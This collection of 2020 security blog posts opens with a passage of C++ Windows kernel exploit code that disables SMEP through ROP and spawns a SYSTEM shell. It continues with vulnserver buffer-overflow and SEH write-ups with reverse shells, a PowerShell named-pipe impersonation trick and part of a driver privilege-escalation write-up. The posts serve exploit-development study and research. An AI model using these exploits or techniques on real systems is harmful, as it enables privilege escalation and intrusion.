        sizeof(shellcode),
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    memcpy(shellcode_addr, shellcode, sizeof(shellcode));

    cout << "[>] Shellcode allocated in userland at: 0x" << (INT64)shellcode_addr
        << endl;

    BYTE input_buff[2088] = { 0 };

    INT64 pop_rcx_offset = kernel_base + 0x146580; // gadget 1
    cout << "[>] POP RCX gadget located at: 0x" << pop_rcx_offset << endl;
    INT64 rcx_value = 0x70678; // value we want placed in cr4
    INT64 mov_cr4_offset = kernel_base + 0x3D6431; // gadget 2
    cout << "[>] MOV CR4, RCX gadget located at: 0x" << mov_cr4_offset << endl;


    memset(input_buff, '\x41', 2056);
    memcpy(input_buff + 2056, (PINT64)&pop_rcx_offset, 8); // pop rcx
    memcpy(input_buff + 2064, (PINT64)&rcx_value, 8); // disable SMEP value
    memcpy(input_buff + 2072, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx
    memcpy(input_buff + 2080, (PINT64)&shellcode_addr, 8); // shellcode

    // keep this here for testing so you can see what normal buffers do to subsequent routines
    // to learn from for execution restoration
    /*
    BYTE input_buff[2048] = { 0 };
    memset(input_buff, '\x41', 2048);
    */

    cout << "[>] Input buff located at: 0x" << (INT64)&input_buff << endl;

    DWORD bytes_ret = 0x0;

    cout << "[>] Sending payload..." << endl;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        sizeof(input_buff),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {
        cout << "[!] DeviceIoControl failed!" << endl;
    }
}

INT64 get_kernel_base() {

    cout << "[>] Getting kernel base address..." << endl;

    //https://github.com/koczkatamas/CVE-2016-0051/blob/master/EoP/Shellcode/Shellcode.cpp
    //also using the same import technique that @tekwizz123 showed us

    PNtQuerySystemInformation NtQuerySystemInformation =
        (PNtQuerySystemInformation)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtQuerySystemInformation");

    if (!NtQuerySystemInformation) {

        cout << "[!] Failed to get the address of NtQuerySystemInformation." << endl;
        cout << "[!] Last error " << GetLastError() << endl;
        exit(1);
    }

    ULONG len = 0;
    NtQuerySystemInformation(SystemModuleInformation,
        NULL,
        0,
        &len);

    PSYSTEM_MODULE_INFORMATION pModuleInfo = (PSYSTEM_MODULE_INFORMATION)
        VirtualAlloc(NULL,
            len,
            MEM_RESERVE | MEM_COMMIT,
            PAGE_EXECUTE_READWRITE);

    NTSTATUS status = NtQuerySystemInformation(SystemModuleInformation,
        pModuleInfo,
        len,
        &len);

    if (status != (NTSTATUS)0x0) {
        cout << "[!] NtQuerySystemInformation failed!" << endl;
        exit(1);
    }

    PVOID kernelImageBase = pModuleInfo->Modules[0].ImageBaseAddress;

    cout << "[>] ntoskrnl.exe base address: 0x" << hex << kernelImageBase << endl;

    return (INT64)kernelImageBase;
}

void spawn_shell() {

    cout << "[>] Spawning nt authority/system shell..." << endl;

    PROCESS_INFORMATION pi;
    ZeroMemory(&pi, sizeof(pi));

    STARTUPINFOA si;
    ZeroMemory(&si, sizeof(si));

    CreateProcessA("C:\\Windows\\System32\\cmd.exe",
        NULL,
        NULL,
        NULL,
        0,
        CREATE_NEW_CONSOLE,
        NULL,
        NULL,
        &si,
        &pi);
}

int main() {

    HANDLE hFile = grab_handle();

    INT64 kernel_base = get_kernel_base();
    send_payload(hFile, kernel_base);
    spawn_shell();
}

Pyt3ra Security Blogs
Buffer Overflow w/ Restricted CharactersYmir F. Eboras | OSCE | OSCP | SLAE| MS. Comp Science
3 May 2020 at 12:57

Buffer Overflow w/ Restricted Characters

Pyt3ra Security Blogs

By: Ymir F. Eboras | OSCE | OSCP | SLAE| MS. Comp Science

3 May 2020 at 12:57

Buffer Overflow Vulnerability w/ restricted characters

Kali Linux

Windows Vista

Vulnerable application: vulnserver.exe (LTER)

Vulnserver.exe is meant to be exploited mainly with buffer overflows vulnerabilities. More info about this application and where to download it can be found here:

http://www.thegreycorner.com/2010/12/introducing-vulnserver.html

github: https://github.com/pyt3ra/Buffer-Overflow-Restricted-Characters

~//********//~~

For the LTER command, there are two ways to exploit the buffer overflow vulnerability, however, both exploits will have similar restricted characters

- Part 1: Vanilla Buffer Overflow w/ Restricted Characters

- Part 2: SEH base Buffer Overflow w/ Restricted Characters.....click here for Part 2

Let's get started...

Fuzzing

Similar to the GMON write-up, I used boofuzz to do the initial fuzzing.

...and after crashing the program, we recreate the crash using the follow Proof-of-Concept

We get a pretty vanilla buffer overflow where the EIP has been overwritten with 41s

Also note that ESP currently points to our buffer. This is key once we figure out an address to redirect our EIP

Now we will need to determine our offset and see exactly which part of our buffer overwrites the EIP register.

As usual, this is accomplished using Metasploit's patter_create.rb to generate 3000 unique characters.

Update our POC with our unique characters, send the exploit, and examine the crash in immunity debugger.

Here we can see that EIP has been overwritten with the following values: 386F4337

Metasploit's pattern_offset.rb can be used to determine the offset with this value.

Once we determine the offset, we update our POC again

We send the POC one more time and examine the crash...if our offset is correct, EIP should be overwritten with x42s

In this case, we can see 42424242 were successfully loaded into the EIP register

Finding bad characters

Now that we are able to redirect our EIP...we will need to find an address to redirect the EIP. Since we know that ESP register points to our buffer, we will be looking for a JMP ESP address.

However, before we choose an address, we will need to verify if there are any bad characters.

We update the POC with the following 256 unique hex characters

After running a few test, it's verified that anything over 7F is being subtracted by 7F as we can see below in our dump….such that x80 - x7F = x01

This means we will not be able to use any hex characters over 7F

Allowed characters:

x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f

Now we will need a call esp or jmp esp address…this will ultimately call our 'Cs' where our reverse shell will be loaded while Kkeeping in mind the restricted characters.

We find the following address using mona.py in immunity debugger

FF E4 = jmp esp

Address: 62501203

We can verify this address is a JMP ESP by searching it

At this point, we can updated our EIP to redirect to this JMP ESP address

As we follow the crash in immunity, we can see that EIP has been successfully overwritten with our JMP ESP address

...once we take the JMP ESP, we are redirected to the top of our Cs

Reverse shell time!

We will need to create our revere shell to encode it with x86/alpha_mixed in order to avoid the restricted characters

We update our POC one last time

Again we follow the jmp esp and we hit the beginning of our reverse shell. We let the code execution continue and successfully get a reverse shell in our Kali listener.

Final Proof-of-Concept

Pyt3ra Security Blogs
SEH Based Buffer Overflow with Restricted CharactersYmir F. Eboras | OSCE | OSCP | SLAE| MS. Comp Science
3 May 2020 at 12:22

SEH Based Buffer Overflow with Restricted Characters

Pyt3ra Security Blogs

By: Ymir F. Eboras | OSCE | OSCP | SLAE| MS. Comp Science

3 May 2020 at 12:22

Structured Exception Handling (SEH)Based Buffer Overflow Vulnerability w/ Restricted Characters

Kali Linux

Windows Vista

Vulnerable application: vulnserver.exe (LTER)

Vulnserver.exe is meant to be exploited mainly with buffer overflows vulnerabilities. More info about this application and where to download it can be found here:

http://www.thegreycorner.com/2010/12/introducing-vulnserver.html

Github: https://github.com/pyt3ra/SEH-based-Buffer-Vulnerablity-128-Restricted-Hex-Characters-

~~~~~//********//~~~~~~

Fuzzing

Fuzzing with boofuzz

We open the boofuzz result using SQLite browser

Recreating the crash with our Proof-of-concept

As usual, we examine the crash using Immunity Debugger and see that our SEH handler address has been overwritten with our buffer

Calculating Offset

We use Metasploit's pattern_create.rb and pattern_offset.rb to generate unique characters and calculate the offset.

Updated POC

The following values overwrite the SEH handler

...which then equates to the following offset positions.

Once again, we update the Proof-of-Concept with the following offset calculations and verify if we can see these values after the crash

Finding restricted characters

After running a few test, it looks like anything over 7F is being subtracted by 7F as we can see below in our dump….such that x80 - x7F = x01

This means we will not be able to use any hex characters over 7F

Allowed characters:

At this point we have successfully done the following:

1. Successfully produced a crash to the program with the buffer we provided

2. Calculated the offset values for address redirection

3. Found all the restricted characters

POP-POP-RET...the key to SEH Based Buffer Overflow Vulnerabilities

I will be using the same POP-POP-RET address from the Vulnserver.exe (GMON) write-up

Updated the POC with the following values...I also added some nopes for the other 4 bytes

We cannot forget about the restricted characters (hex 80 to FF)

We get a crash, however, we can see that our POP-POP-RET address has been changed to 625010B4 to 62501035 where the last byte has been changed (B4 - 7F = 35)

Also note, that our 90s have been changed to 11 (90 - 7F = 11)...we will worry about this part later

We found another POP-POP-RET address

Again, we update the POC with this new POP-POP-RET address

We fire up the POC and set a breakpoint in immunity. As we check the SEH chain plugin, we can confirm that we were able to redirect the SEH handler to the address 6250120B

We allow the execution and hit our breakpoint

We step through the POP POP RET instructions, and we hit our first entry (x90s) or in this case, x11s (90 - 7F)

First Jump

After we are redirected to the pop-pop-ret address we are then sent to the 4 bytes right before it. We will have to use these 4 bytes to get our first jump

For the first jmp we will use the jnz conditional jump and fill the extra bytes with inc eax. With GMON we used EB 09 or jmp 9 bytes, however, EB is unusable since it is one of the restricted characters.

At this time, eax is currently 0x00000000 so I used the inc eax (41) to disable the ZF. Then do the jump-if-not-zero (jnz) instruction

This jumps pass our SEH handler address…also, note that if we follow it in the dump that we can see we only have 48 bytes of address space…not enough for a reverse/bind shell.

Second jump

Now we have 48 bytes that we can use to do our second jump while keeping in mind the restricted characters

To circumvent the restricted characters, we will be 'carving' our shellcode with SUB instructions

More info about shellcode carving can be found here: http://vellosec.net/2018/08/carving-shellcode-using-restrictive-character-sets/

First, we will need to realign our stack so that we will know where our decoded jump will show up. In this case, we want our decoded jump opcodes just below our first jump at the following address:

Before we carve it out, we have to realign ESP to address 00E9FFF8 which can be done with the following instructions:

(1)

push esp

pop eax ;move the value of esp to eax

add ax, 0d75 ;add 3445 to eax

add ax, 0465 ;add 1125 to eax

push eax ;push new eax value to the stack

pop esp ;move the value of eax to esp

Note that after we do this, we will need to zero out eax for shellcode carving to work

There are multiple ways to zero out eax (i.e. xor eax, eax), however, this will not work due to restricted characters

We will use the AND operator using the following values

(2)

AND 554E4D4A = ‭101 0101 0100 1110 0100 1101 0100 1010‬

AND 2A313235 = ‭010 1010 0011 0001 0011 0010 0011 0101‬

--------------------------------------------------------------------------------

=000 0000 0000 0000 0000 0000 0000 0000

(3)

For our second jump, we will be using a reverse short jump: EB 80

In order to carve out EB 80 we use the following values:

\xeb\x80\x90\x90 = 6464 7F15

0 - 909080EB = 6F6F7F15

32103355 + 32103355 + 0B4F 186B = 6F6F7F15

0 - 3210 3355 - 3210 3355 - 0B4F 186b = 909080EB

We will do SUB operations with these values then push the result to the stack

After everything is said and done, our second jump will look like this

We execute our updated POC and trace code execution in immunity debugger

Here we can see that our second jump instructions starts at address 00EFFFD1 and then the EB 80 instructions are carved at address 00EFFFFA

Once we take the jmp short 80h, we get another 72-byte address space that we can work with. This can be seen in our hex dump at address 00EFFF7C

Third Jump

After the second jump, the address space is still not big enough for reverse or bind shell...which means we will need to do another jump.

As usual, we will need to realign ESP to set where are decoded instructions will be saved. In this case, ESP currently points at address 00FAFFFD and we would like to point it to 0FAFFAE.

After we store the value of ESP to EAX we execute the following SUB instruction

SUB AL, 4F (00FAFFFD - 4F = 0FAFFAE)

We then pop this address back to ESP

After we run the following instructions, we can see that ESP points to address 00FAFFAE…this is where our decoded jump instructions will be stored

For the third jump, we will be using the following instructions:

\x81\xec\x48\x0d\x00\x00 (SUB ESP, 0DA0)

\xff\xe4 (JMP ESP)

00FAFFAE - 0DA0 = 00FAF20E

00FAF20E is the address that is just below the beginning of our buffer....this will give us about 3400+ bytes worth of address space for our final shellcode

We will be carving 4 bytes at a time beginning at the lowest 4 bytes (since this will be pushed into the stack in LIFO manner)

As usual, we zero out EAX first then carve the instructions using SUB instructions before EAX gets pushed into the stack

Here we can see our 4 bytes getting decoded at address 00D0FFBF

...we carve out the next 4 bytes

...and follow the instructions being decoded

This completes our third as we can we have success decoded our next jump instructions @ address 00D0FFBB:

SUB ESP, 0D48

JMP ESP

We continue code execution to get to our SUB ESP and JMP ESP

Here we can see that after the SUB instruction, our ESP point 00D0F273

We take the JMP ESP and we are provided with 3000+ bytes of address space for our final shellcode

Final Shellcode

At this point, we can use MSF to create a reverse shell encoded with alpha_mixed.

Also, note that we need to add BufferRegister=ESP to get rid of some restricted characters at the beginning of the shellcode.

More info about BufferRegister flag can be found here: https://www.offensive-security.com/metasploit-unleashed/alphanumeric-shellcode/

Final POC: https://github.com/pyt3ra/SEH-based-Buffer-Vulnerablity-128-Restricted-Hex-Characters-/blob/master/poc.py

Winsider Seminars & Solutions Inc.
Faxing Your Way to SYSTEM — Part TwoYarden Shafir ＆#38； Alex Ionescu
30 April 2020 at 18:55

Faxing Your Way to SYSTEM — Part Two

Winsider Seminars & Solutions Inc.

By: Yarden Shafir ＆#38； Alex Ionescu

30 April 2020 at 18:55

[…]

Pyt3ra Security Blogs
SEH Based Buffer OverflowYmir F. Eboras | OSCE | OSCP | SLAE| MS. Comp Science
29 April 2020 at 17:49

SEH Based Buffer Overflow

Pyt3ra Security Blogs

By: Ymir F. Eboras | OSCE | OSCP | SLAE| MS. Comp Science

29 April 2020 at 17:49

Structured Exception Handling (SEH)Based Buffer Overflow Vulnerability

Kali Linux

Windows Vista

Vulnerable application: vulnserver.exe (GMON)

Vulnserver.exe is meant to be exploited mainly with buffer overflows vulnerabilities. More info about this application and where to download it can be found here:

http://www.thegreycorner.com/2010/12/introducing-vulnserver.html

github: https://github.com/pyt3ra/SEH-Based-Buffer-Overflow-Vulnerability

~//********//~~

Once the application has been downloaded, we run it on our Vista Machine and start fuzzing.

Fuzzing

For fuzzing, I will be using boofuzz, and documentation can be found here:

https://boofuzz.readthedocs.io/en/stable/

First off, we connect to the application to test its functionality--specifically, we will be testing the GMON command as shown below

Here is the boofuzz template/proof-of-concept that I used for fuzzing:

We fire up this python fuzzer and get a crash.

With boofuzz, it generates a fuzzing result that can be further accessed using a DB application. For this, I am using a sqlitebrowser that provides a nice SQLite GUI.

We can see in this result (line 24) that our fuzzer sent 5013 bytes before the crash occurred

Proof-of-concept

Here's the original proof-of-concept that I will be using throughout the exploit development

We will begin by recreating the crash using this POC

We fire up this POC and examine the crash in Windows Vista using Immunity Debugger.

We successfully get a crash with our buffer of 41s.

Since this will be an SEH based buffer overflow, we look at the crash in SEH chain which shows that SEH handler address being overwritten with our 41s

After being able to successfully overwrite the SEH handler, we then need to figure out the correct offset. This can be done by feeding our POC with unique characters of 5100 bytes long.

We will be using Metasploit's pattern_create.rb as shown below.

We then update our POC with the following unique chars and again fire up our exploit.

The POC successfully crashes the vulnserver.exe program again and follow the crash in immunity.

Here we can see that SEH has been overwritten with the following values:

326E4531 & 45336E45

We can use these two values to calculate the offset using Metasploit's pattern_offset.rb

Note: Immunity Debugger's mona.py can also be used to create the pattern_create and pattern_offset

We get the following offset:

SEH: 3519

nSEH: 3515

We can use these offset values to update the POC one more time and recalculate our buffer

Again, we fire up the updated POC and examine the crash in immunity.

We can see that nSEH has been overwritten with x42s and the SEH has been overwritten with x43s

Redirecting the SEH Handler

At this point, we have successfully accomplished the following:

1. Fuzzed the vulnerable application given a long string of buffer

2. We have calculated the offset for the SEH Handler

One common way (or only way?) to exploit a buffer overflow vulnerability is using the POP-POP-RET

This is possible because when an application crashes and the SEH happens, our malicious buffer is loaded into the stack and the crash makes this buffer accessible using the POP-POP-RET sequence of instructions.

More information about POP-POP-RET can be found in this blog:

https://dkalemis.wordpress.com/2010/10/27/the-need-for-a-pop-pop-ret-instruction-sequence/

Bottom right of the immunity debugger crash below shows the current state of the stack after the crash

Our buffer is loaded at address 00FDF1F0 (note that addresses 00FDF1E8 and 00FDF1FC will need to be pop from the stack)

POP - 00FDF1E8

POP - 00FDF1FC

RET - 00FDF1F0 (returns our buffer)

Bad characters are no bueno

Before we look for a POP-POP-RET address and redirect our SEH Handler to it, we need to discover bad characters that will truncate or mangle our exploit.

Searching for bad characters can be accomplished by feeding 255 unique hex characters and follow code execution in immunity debugger to see it certain hex characters truncate or mangle our buffer

Again, execute our POC and trace code execution in immunity debugger.

Looking at the hex dump (bottom left), we can see the application took all 255 hex characters (0x01 to 0xff) which means that other than 0x00, all hex characters can be used.

Now we are ready to find any POP-POP-RET address. This can be done using the mona.py plugin in immunity debugger (I couldn't get it to work) or you can just do it manually by opening up the essfunc.dll and searching for these sets of instructions.

I found the POP-POP-RET at address 625010B4

Once again, we update our POC with the SEH Handler redirect address. We examine the crash by adding a breakpoint at address 625010B4 and see if we can hit the breakpoint for a successful redirection.

Note that the address has to be in little-endian format. Also, we added a first jump (EB 06) and 2 NOPs.

We get a another crash, examine the SEH chain which shows our POP-POP-RET address and if we allow the exception to happen, we are successfully redirected to address 625010B4

We step through the POP-POP-RET codes and we then hit our first jump (EB 06).

...once we take the jmp and hit the address 00EFFF7D. This gives us roughly about 70 bytes of address space. This space is not enough to get a reverse or bind shellcode however, we can utilize this space to further jump.

For our second jump, I am using the following instructions which were straight from the OSCE course.

These instructions basically moves the address of EIP to ECX then 8 bytes of ECX gets decreased before the jump is taken.

These instructions can be created to a nasm file then objdump can be used to generate the opcodes.

Below shows these instructions and their respective opcodes

Note that at this point, ecx points to address 00EFFD87. We step through the instructions, take the jump and follow the new EIP 00EFFD87 in dump which gives us a bigger address space…512 bytes to be exact

00EFFF8B - 00EFFFD87= 512 in decimal

We update our POC once again with these jump instructions and now we are afforded an address space big enough for our shellcode.

SHELL TIME!

We create a reverse shell.

We update our POC buffer one last time

We execute our POC again and follow code execution in our debugger

And after taking our second jump, we hit our NOPs and if we follow the eip in dump, we can see that our encoded shellcode is just right below it.

If we continue code execution, we hit our shellcode and get a reverse shell in kali

Final POC

Conclusion:

Fuzzed the vulnerable application given a long string of buffer
We have calculated the offset for the SEH Handler
Determine if there are any bad characters
Found a POP-POP-RET address to access our buffer
Use the 4 bytes @ offset 3515 to do our first jump for a 70-byte address space
Use the 70 bytes address space for the second jump which gave us 512 bytes of address space
Add shellcode

Tyranid's Lair
Sharing a Logon Session a Little Too Muchtiraniddo
25 April 2020 at 23:34

Sharing a Logon Session a Little Too Much

Tyranid's Lair

By: tiraniddo

25 April 2020 at 23:34

The Logon Session on Windows is tied to an single authenticated user with a single Token. However, for service accounts that's not really true. Once you factor in Service Hardening there could be multiple different Tokens all identifying in the same logon session with different service groups etc. This blog post demonstrates a case where this sharing of the logon session with multiple different Tokens breaks Service Hardening isolation, at least for NETWORK SERVICE. Also don't forget S-1-1-0, this is NOT A SECURITY BOUNDARY. Lah lah, I can't hear you!

Let's get straight to it, when LSASS creates a Token for a new Logon session it stores that Token for later retrieval. For the most part this isn't that useful, however there is one case where the session Token is repurposed, network authentication. If you look at the prototype of AcquireCredentialsHandle where you specify the user to use for network authentication you'll notice a pvLogonID parameter. The explanatory note says:

"A pointer to a locally unique identifier (LUID) that identifies the user. This parameter is provided for file-system processes such as network redirectors. This parameter can be NULL."

What does this really mean? We'll if you have TCB privilege when doing network authentication this parameter specifies the Logon Session ID (or Authentication ID if you're coming from the Token's perspective) for the Token to use for the network authentication. Of course normally this isn't that interesting if the network authentication is going to another machine as the Token can't follow ('ish). However what about Local Loopback Authentication? In this case it does matter as it means that the negotiated Token on the server, which is the same machine, will actually be the session's Token, not the caller's Token.

Of course if you have TCB you can almost do whatever you like, why is this useful? The clue is back in the explanatory note, "... such as network redirectors". What's an easily accessible network redirector which supports local loopback authentication? SMB. Is there any primitives which SMB supports which allows you to get the network authentication token? Yes, Named Pipes. Will SMB do the network authentication in kernel mode and thus have effective TCB privilege? You betcha. To the PowerShellz!

Note, this is tested on Windows 10 1909, results might vary. First you'll need a PowerShell process running at NETWORK SERVICE. You can follow the instructions from my previous blog post on how to do that. Now with that shell we're running a vanilla NETWORK SERVICE process, nothing special. We do have SeImpersonatePrivilege though so we could probably run something like Rotten Potato, but we won't. Instead why not target the RPCSS service process, it also runs as NETWORK SERVICE and usually has loads of juicy Token handles we could steal to get to SYSTEM. There's of course a problem doing that, let's try and open the RPCSS service process.

PS> Get-RunningService "rpcss"
Name Status ProcessId
---- ------ ---------
rpcss Running 1152

PS> $p = Get-NtProcess -ProcessId 1152
Get-NtProcess : (0xC0000022) - {Access Denied}
A process has requested access to an object, but has not been granted those access rights.

Well, that puts an end to that. But wait, what Token would we get from a loop back authentication over SMB? Let's try it. First create a named pipe and start it listening for a new connection.

PS> $pipe = New-NtNamedPipeFile \\.\pipe\ABC -Win32Path
PS> $job = Start-Job { $pipe.Listen() }

Next open a handle to the pipe via localhost, and then wait for the job to complete.

PS> $file = Get-NtFile \\localhost\pipe\ABC -Win32Path
PS> Wait-Job $job | Out-Null

Finally open the RPCSS process again while impersonating the named pipe.

PS> $p = Use-NtObject($pipe.Impersonate()) {
>> Get-NtProcess -ProcessId 1152
>> }
PS> $p.GrantedAccess
AllAccess

How on earth does that work? Remember I said that the Token stored by LSASS is the first token created in that Logon Session? Well the first NETWORK SERVICE process is RPCSS, so the Token which gets saved is RPCSS's one. We can prove that by opening the impersonation token and looking at the group list.

PS> $token = Use-NtObject($pipe.Impersonate()) {
>> Get-NtToken -Impersonation
>> }
PS> $token.Groups | ? Name -Match Rpcss
Name Attributes
---- ----------
NT SERVICE\RpcSs EnabledByDefault, Owner

Weird behavior, no? Of course this works for every logon session, though a normal user's session isn't quite so interesting. Also don't forget that if you access the admin shares as NETWORK SERVICE you'll actually be authenticated as the RPCSS service so any files it might have dropped with the Service SID would be accessible. Anyway, I'm sure others can come up with creative abuses of this.

The Human Machine Interface
CVE-2020-12138 Exploit Proof-of-Concept, Privilege Escalation in ATI Technologies Inc. Driver atillk64.sysh0mbre
25 April 2020 at 04:00

CVE-2020-12138 Exploit Proof-of-Concept, Privilege Escalation in ATI Technologies Inc. Driver atillk64.sys

The Human Machine Interface

By: h0mbre

25 April 2020 at 04:00

Background

I’ve been focusing, really since the end of January, on working through the FuzzySecurity exploit development tutorials on the HackSysExtremeVulnerableDriver to try and learn some more about Windows kernel exploitation and have really enjoyed my time a lot.

During this time, @ihack4falafel released some proof-of-concept exploits[1][2] against several Windows kernel-mode drivers. The takeaway from these write-ups, for me, was that 3rd party drivers that are responsible for overclocking, RGB light-management, hardware diagnostics are largely broken.

The types of vulnerabilities that were disclosed in these write-ups often were related to low-privileged users having the ability to interact with a kernel-mode driver that was able to directly manipulate physical memory, where all kinds of privileged information resides.

The last FuzzySecurity Windows Exploit Development Tutorial Series is b33f’s exploit against a Razer driver exploiting this very same type of vulnerability.

Getting more interested in this type of bug, I sought out more write-ups and found some great proof-of-concepts:

Jackson T’s write-up of an LG driver privilege escalation vulnerability,
hatRiot’s write-up of a Dell driver privilege escalation vulnerability, and
ReWolf’s write-up of a few different driver vulnerabilities within the same type of logic bug realm.

After reading through those, I decided to just start downloading similar software and searching for drivers that I hadn’t seen CVEs for and that had some key APIs. My criteria when searching was that the driver had to:

allow low-privileged users to interact with it,
have either an MmMapIoSpace or ZwMapViewOfSection import.

As someone who is very new to this type of thing, I figured with the help of the aforementioned walkthroughs, if I was able to find a driver that would allow me to interact with physical memory I could successfully develop an exploit.

Disclaimer

This is kind of a niche space and as a new person getting into this very specific type of target I wasn’t really aware of the best places to look for more information about these types of vulnerable drivers. The first few things I checked was that there were no CVEs for the driver and that the driver hadn’t been mentioned on Twitter by security researchers. By the time I had reversed the driver and discovered it to be vulnerable in theory, but without a working exploit, I realized that the driver had been classified as vulnerable by researchers Jesse Michael and Mickey Shkatov at Eclypsium. The driver gets a small mention in their github repo but without specifically identifying the vulnerabilities that exist.

I’m not claiming responsibility for finding the vulnerability, since I was far from the first. Jesse and Mickey were given all of the credit on the CVE application and I can prove this upon request.

I was able to get in contact with Jesse via Twitter and he was extremely charitable with his time. He gave me a great explanation of their interactions with a vendor about the driver.

At this point, since there was no published proof-of-concept, I decided to press on and develop the exploit, which Jesse wholeheartedly supported and encouraged. I figured I’d develop an exploit, show AMD the proof-of-concept, and give them 90 days to respond/patch or explain that they’re not concerned.

Huge thanks to Jesse for being so charitable. He’s also incredibly knowledgeable and was willing to teach me tons of things along the way when answering my questions.

GIGABYTE Fusion 2.0

One of the first software packages I downloaded was GIGABYTE’s Fusion 2.0 software which comes with several drivers. I won’t get any more in-depth with the types of drivers included other than the subject of this post, atillk64.sys. Using default installation options, the driver was installed here: C:\Program Files (x86)\GIGABYTE\RGBFusion\AtiTool\atillk64.sys.

The driver file description states the product name is ATI Diagnostics version 5.11.9.0 and its copyright is ATI Technologies Inc. 2003. I’m not sure what other software packages out there also install this driver, but I’m sure Fusion 2.0 isn’t the only one. I’ve found that several of these hardware diagnostic/configuration software suites install licensed drivers that are often slightly modified (or not modified at all!) versions of known-to-be vulnerable code-bases like the classic WinIO.sys.

atillk64.sys Analysis

The first thing I needed to know was what types of permissions the driver had and if lower-privileged users could interact with the driver. Looking at the device with OSR’s devicetree, we can see that this is the case.

Reversing the driver was pretty easy even as a complete novice just because it is so small. There is the hardly any surface area to explore and the IOCTL handler routine was pretty straightforward. MmMapIoSpace was one of the imports so I was already interested at this point.

One routine caught my attention early on because the API call chain was very similar to one of the driver routines that @ihack4falafel wrote up a proof-of-concept for.

The routine first calls MmMapIoSpace, which takes a physical address as a parameter and a length (and cache type) and maps that memory into system memory and returns a pointer to the now virtual address that corresponds to the beginning of the physical memory you asked to be mapped. So at this point, this system address is not available to us as a userland process. It is stored in rax and the result is checked to make sure the API call succeeded and did not return NULL. After some experimentation, as long as we pass a check that our input buffer is 0x18 in length, we are able to completely control two of the MmMapIoSpace parameters: NumberOfBytes and PhysicalAddress. These values are taken from rdi offsets which is the address of our input buffer. CacheType is hardcoded as 0.

If the call succeeded, a call is made to IoAllocateMdl with the same values. The virtual address returned by MmMapIoSpace is given as a parameter as well as the same Length value. This API also associates our newly created MDL with an IRP.

If the call succeeded, a subsequent call is made to MmBuildMdlForNonPagedPool which takes the MDL we just created and ‘updates it to describe the underlying physical pages.’ MSDN states that IoAllocateMdl doesn’t initialize the data array that follows the MDL structure, and that drivers should call MmBuildMdlForNonPagedPool to initialize the array and describe the physical memory in which the buffer resides.

Next, is a call to MmMapLockedPages, which is an old an deprecated API. This call takes the updated MDL and maps the physical pages that are described by it into our process space. It returns the starting address of this mapping to us eventually you’ll see as the return value (rax) is eventually placed in rbx and moved to [rdi] which will be our output buffer in DeviceIoControl.

Subsequent API calls to IoFreeMdl and MmUnmapIoSpace perform some cleanup and free up the pool allocations (as far as I know, please correct me if I’m wrong).

Exploitation Strategy

The first 8 bytes of our output buffer at this point hold a pointer to the mapped memory in our process space.

Say we mapped 0x1000 bytes from physical address offset 0x100000000 all of the data from 0x100000000 to 0x100001000 would be available to us within our process space. This is bad because we are a low-privileged process and this data can contain arbitrary system/privileged data.

The strategy for exploiting this was heavily informed by FuzzySec’s approach to exploiting his aforementioned Razer driver. At a high-level we are going to:

map physical memory into our process space,
parse through the data looking for “Proc” pool tags,
identify our calling process (typically cmd.exe) and note the location of our security token,
identify a process typically running as SYSTEM (something like lsass.exe) and note the value of its security token,
and finally, overwrite our token with the SYSTEM process token value to gain nt authority/system.

“Proc” Tags in the Pool

Following along with FuzzySec’s strategy here, the first thing we need to do is identify what these data structures actually look like in the pool. There will be pool chunk header and then a tag prepended to each pool allocation. The tag we’ll be looking for in our mapped memory is “Proc”, which is 0x636f7250 as an integer value.

To find some examples, we can use the kd !poolfind "Proc" command to identify pool allocations with our tag.

Looking at the output, we see we started scanning large pool allocations for the tag. I quit the process after 5 minutes or so as this should be enough sample data.

Scanning large pool allocation table for tag 0x636f7250 (Proc) (ffffd48c9d250000 : ffffd48c9d550000)

ffffd48ca040f340 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca10bd380 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca53b83e0 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca21c60b0 : tag Proc, size     0xb70, Nonpaged pool
ffffd48cb36e6410 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca09533b0 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca08c8310 : tag Proc, size     0xb70, Nonpaged pool
ffffd48c9bfd40c0 : tag Proc, size     0xb70, Nonpaged pool
ffffd48c9e59d310 : tag Proc, size     0xb70, Nonpaged pool
ffffd48c9fce0310 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca150f400 : tag Proc, size     0xb70, Nonpaged pool
ffffd48cae7de390 : tag Proc, size     0xb70, Nonpaged pool
ffffd48ca0ddc330 : tag Proc, size     0xb70, Nonpaged pool

Just plugging in the first address there in the WinDBG Preview memory pane, we can see that from this address, if we subtract 0x10 and then add 0x4, we see our “Proc” tag.

kd> da ffffd48ca040f340-0x10+0x4
ffffd48c`a040f334  "[email protected]"

So we’ve identified a “Proc” pool allocation and we have a good idea of how they are allocated. As b33f explains, they are all 0x10 aligned, so every address here ends in a 0. We know that at some arbitrary address ending in 0, if we look at <address> + 0x4 that is where a “Proc” tag might be.

So the first strategy we’ll employ in parsing for data we’re interested in, is to start at our mapped address and iterate by 0x10 each time and checking the value of our address + 0x4 for “Proc”.

From here, we can appeal to the EPROCESS structure to find the hardcoded offsets to EPROCESS members we’re interested in, which are going to be:

ImageFileName (the name of the process),
UniqueProcessId, and
Token.

I did all my testing on Windows 10 build 18362 and these were the offsets:

kd> !process 0 0 lsass.exe
